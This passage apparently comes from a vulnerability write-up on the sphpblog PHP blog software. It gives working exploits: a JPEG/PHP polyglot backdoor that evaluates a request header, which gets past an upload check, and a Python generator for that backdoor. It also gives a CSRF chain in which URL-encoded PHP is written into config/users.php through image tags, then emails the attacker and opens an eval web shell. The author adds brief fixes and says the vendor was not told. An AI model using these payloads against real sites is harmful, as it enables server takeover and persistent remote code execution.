  06 12 41 51 07 61 71 13 - 22 32 81 08 14 42 91 a1   ..AQ.aq. .2...B..
  b1 c1 09 23 33 52 f0 15 - 62 72 d1 0a 16 24 34 e1   ....3R.. br....4.
  25 f1 17 18 19 1a 26 27 - 28 29 2a 35 36 37 38 39   ........ ...56789
  3a 43 44 45 46 47 48 49 - 4a 53 54 55 56 57 58 59   .CDEFGHI JSTUVWXY
  5a 63 64 65 66 67 68 69 - 6a 73 74 75 76 77 78 79   Zcdefghi jstuvwxy
  7a 82 83 84 85 86 87 88 - 89 8a 92 93 94 95 96 97   z....... ........
  98 99 9a a2 a3 a4 a5 a6 - a7 a8 a9 aa b2 b3 b4 b5   ........ ........
  b6 b7 b8 b9 ba c2 c3 c4 - c5 c6 c7 c8 c9 ca d2 d3   ........ ........
  d4 d5 d6 d7 d8 d9 da e2 - e3 e4 e5 e6 e7 e8 e9 ea   ........ ........
  f2 f3 f4 f5 f6 f7 f8 f9 - fa ff da 00 0c 03 01 00   ........ ........
  02 11 03 11 00 3f 00 f7 - fa 28 a2 80 3f ff d9 d9   ........ ........

  C:\>ren img1x1.jpg backdoor.php

  The created file is still a valid jpg image: the PHP code sits in a
  COM (comment) segment (marker ff fe, length 00 26 in the dump above),
  which image parsers skip, so the check made by getimagesize() is
  bypassed. The backdoor is then stored as "images/emoticons/backdoor.php"
  and executed by the server as soon as it is requested.
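  The edjpgcom step and the reason the check passes can both be shown in
  a few lines. The script below is an added example, not part of the
  advisory: inject_comment() does what edjpgcom does (inserts a COM
  segment carrying arbitrary bytes), and jpeg_size() walks the marker
  stream the way a getimagesize()-style check does, skipping every
  segment by its length field until it reaches a SOF marker. The input
  image is a constructed minimal marker stream (SOI, APP0, SOF0, EOI)
  with no tables or scan data: enough for a marker walker, not for a
  pixel decoder. Feeding a real JPEG such as img1x1.jpg to inject_comment()
  works the same way.

```python
"""JPEG COM-segment polyglot and a getimagesize()-style marker walk.

Added example, not sphpblog code and not the edjpgcom tool.
"""
import struct

SOI, EOI, APP0, COM, SOF0, SOS = 0xFFD8, 0xFFD9, 0xFFE0, 0xFFFE, 0xFFC0, 0xFFDA
SOF_MARKERS = {0xFFC0, 0xFFC1, 0xFFC2}  # baseline, extended sequential, progressive


def _segment(marker, payload):
    # The 16-bit length counts itself plus the payload, not the marker.
    return struct.pack(">HH", marker, len(payload) + 2) + payload


def minimal_jpeg(width=1, height=1):
    """Constructed header-only JPEG: SOI + JFIF APP0 + SOF0 (8-bit, 3 components) + EOI."""
    jfif = b"JFIF\x00" + bytes([1, 1, 1]) + struct.pack(">HH", 0x60, 0x60) + b"\x00\x00"
    sof0 = (bytes([8]) + struct.pack(">HH", height, width)
            + bytes([3, 1, 0x22, 0, 2, 0x11, 1, 3, 0x11, 1]))
    return (struct.pack(">H", SOI) + _segment(APP0, jfif)
            + _segment(SOF0, sof0) + struct.pack(">H", EOI))


def inject_comment(jpeg, payload):
    """Return `jpeg` with a COM segment holding `payload` inserted right after SOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    if len(payload) > 0xFFFF - 2:
        raise ValueError("payload does not fit in one COM segment")
    return jpeg[:2] + _segment(COM, payload) + jpeg[2:]


def jpeg_size(data):
    """(width, height) from the first SOFn segment, or None if this is not a JPEG.
    Every other segment (APP0, COM, DQT, DHT ...) is skipped blind by its length."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(data):
        marker, length = struct.unpack(">HH", data[pos:pos + 4])
        if marker >> 8 != 0xFF:
            return None  # lost marker sync
        if marker in SOF_MARKERS:
            # SOF payload: precision (1 byte), height (2), width (2), ...
            height, width = struct.unpack(">HH", data[pos + 5:pos + 9])
            return width, height
        if marker in (EOI, SOS):
            return None  # end of headers without any SOF
        pos += 2 + length
    return None


if __name__ == "__main__":
    backdoor = inject_comment(minimal_jpeg(), b"<?php eval($_SERVER[HTTP_SHELL]); ?>")
    print(jpeg_size(backdoor), backdoor[:44])
```

  With the advisory's payload the inserted segment is "ff fe 00 26 ...",
  the same bytes the hexdump above shows. PHP treats everything outside
  "<?php ... ?>" as literal output, so when backdoor.php is requested the
  binary header is echoed and the eval() runs. The fixes are on the
  server side: generate the stored filename yourself with a whitelisted
  image extension, re-encode the upload (e.g. through GD, which drops COM
  segments), and disable script execution in the upload directory.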



  VIII - CODE EXECUTION (+CSRF)

  There is a CSRF vulnerability which leads to PHP code
  execution; this is the critical point of this script.
  Let's see the code of the file "manage_users.php":

   61| if ( $_GET[ 'action' ] == "update" ) {
     |
   63|  if ($_SESSION[ 'fulladmin' ] != 'yes' ) {
   64|          echo($lang_string['fulladminerror']);
   65| } else {
   66| 
   67|   // First read and remove the offending line
   68|   $pfile = fopen("config/users.php","a+");
   69|   rewind($pfile);
     |
   70|   while (!feof($pfile)) {
   71|     $line = fgets($pfile);
   72|     $tmp = explode('|', $line);
   73| 
   74|     if ( $_GET[ 'type' ] == "edit" ) {
   75|       if ( $tmp[1] != $_GET[ 'user' ] )
     |          { $newfile = $newfile . $line; }
   76|     } else {
   77|       $newfile = $newfile . $line;
   78|     }
   79|   }
   80|   fclose($pfile);
     |
  101|   $blankfield = "";
  102| 
  103|   // Create the record structure
  104|   if ( $_GET[ 'type' ] == "edit" ) {
     |
  107|     $password = $_GET[ 'oldpasshash' ];
  108|     if ( $password != $_POST[ 'sPassword' ] ) {
  109|       $password = crypt($_GET[ 'user' ],$_POST[ 'sPassword' ] );
  110|     }
  111| 
  112|     $array =
     |     array($_POST[ 'sFullname' ], $_GET[ 'user' ], $password,
     |     $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
     |     $modcomments, $deleteentries, $editany, $blankfield);
     |
  113|   } else {
     |
  114|     $array =
     |     array($_POST[ 'sFullname' ], $_POST[ 'sUsername' ],
     |     crypt( $_POST[ 'sUsername' ], $_POST[ 'sPassword' ] ),
     |     $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
     |     $modcomments, $deleteentries, $editany, $blankfield);
  115|   }
     |
  116|   $str = implode('|', $array);
  117|   $newfile = $newfile . $str . "\n";
     |
  120|   $pfile = fopen("config/users.php","w");
  121|   fwrite($pfile, $newfile);
  122|   fclose($pfile);
  123| 
  124|   redirect_to_url("manage_users.php");
  125| }
  126| }

  As you can see nothing filters PHP tags (e.g. strip_tags())
  before the user's data is written into a .php file, and the
  username comes straight from $_GET['user']. The author of the
  script did add a ".htaccess" file in the "config" directory.
  Let's see the content of this file:
&nbsp;&nbsp;
   1| IndexIgnore *
   2| 
   3| <Files .htaccess>
   4| order allow,deny
   5| deny from all
   6| </Files>
   7| 
   8| <Files *.txt>
   9| order allow,deny
  10| deny from all
  11| </Files>

  So we can't list the content of the directory, and we don't
  have access to .htaccess/.txt files. But .php files are still
  served, and executed, by the web server! Reaching this code
  requires full admin rights... but since the PHP code is written
  from GET parameters, a forged link is enough: that's why there's
  also a CSRF vulnerability. In our example we use this php code;
  it is written with heredocs and unquoted array keys, so no quote
  character is needed and magic_quotes_gpc=Off is not required:

   1| <?php
   2| 
   3| if(isset($_GET[mail]))
   4| {
   5| $mail = <<<MAIL
   6| hacker@you.com
   7| MAIL;
   8| 
   9| $subject = <<<SUBJ
  10| Hey !
  11| SUBJ;
  12| 
  13| $body = <<<BODY
  14| Code executed
  15| BODY;
  16| 
  17| mail($mail,$subject,$body);
  18| }
  19| else eval($_SERVER[HTTP_SHELL]);
  20| 
  21| ?>

  So the attacker just has to post (using the XSS)
  something like this:

  <img src=http://<site>/manage_users.php?action=update
  &type=edit&user=%3C%3Fphp%0D%0A%0D%0Aif%28isset%28%24
  _GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24mail+%3D+%3C%3C
  %3CMAIL%0D%0Ahacker%40you.com%0D%0AMAIL%3B%0D%0A%0D%0
  A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0D%0ASUBJ%
  3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%0D%0ACode+exe
  cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail%2C%24sub
  ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval%28%24_SE
  RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%3E>
  <!--- Write php code --->

  <img src=http://<site>/config/users.php?mail=1>
  <!--- mail the attacker --->

  <img src=http://<site>/trackback_delete_cgi.php?track
  back=MY_COMMENT_FILENAME>
  <!--- delete the comment --->

  Then he has to wait until the admin views his comment. The
  admin's browser sends the requests to the script, and so the PHP
  code is written into "config/users.php" and run on the next
  request to it.



  IX - END
  
  As you can see there are some pretty cool things here:
 
  - [III] We bypass the NoScript Firefox extension:
    we don't use any <script> tags.

  - [V] We use a "self inclusion" technique.
    We use html and php comment tags, which are very
    useful in our case.

  I didn't contact the author of the script, but if
  he keeps himself informed of updates concerning his
  script, he should correct these vulnerabilities as
  quickly as possible.


  //Greetz: ddx39, berga, wo, overlock[]
                              
